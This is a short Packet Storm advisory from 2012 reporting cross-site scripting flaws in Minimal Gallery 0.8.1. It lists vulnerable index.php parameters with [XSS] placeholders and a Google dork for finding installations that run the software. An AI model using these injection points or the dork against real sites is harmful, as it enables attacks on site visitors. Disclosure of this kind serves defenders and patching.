Minimal Gallery 0.8.1 Cross Site Scripting

2012-09-16T00:00:00
ID PACKETSTORM:116593
Type packetstorm
Reporter ayastar
Modified 2012-09-16T00:00:00

Description

                                        
                                            `#-----------------------------------------------------------------------------------------------  
# title : minimal Gallery 0.8.1 XSS Vulnerability |  
#-----------------------------------------------------------------------------------------------  
# Author : ayastar |  
#-----------------------------------------------------------------------------------------------  
# Script Name : minimal Gallery v 0.8.1 |  
#-----------------------------------------------------------------------------------------------  
# Script Download Page : http://minimaldesign.net/downloads/projects/minimal-gallery |  
#-----------------------------------------------------------------------------------------------  
# Script Vulnerable Type : XSS Vulnerability |  
#-----------------------------------------------------------------------------------------------  
# Google dork ----> : "powered by minimal Gallery 0.8.1" OR "powered by minimal Gallery 0.8" |  
#----------------------------------------------------------------------------------------------|  
# [#]EXPLOIT : |  
#htp://localhost/PAth/index.php?c=[XSS] |  
#htp://localhost/PAth/index.php?s=[XSS] |  
#htp://localhost/PAth/index.php?s=y&id=[XSS] |  
#htp://localhost/PAth/index.php?m=[XSS] |  
#htp://localhost/PAth/index.php?d=[XSS] |  
#-----------------------------------------------------------------------------------------------  
# greerz : to allah and all muslims from Morocco |  
#-----------------------------------------------------------------------------------------------  
  
`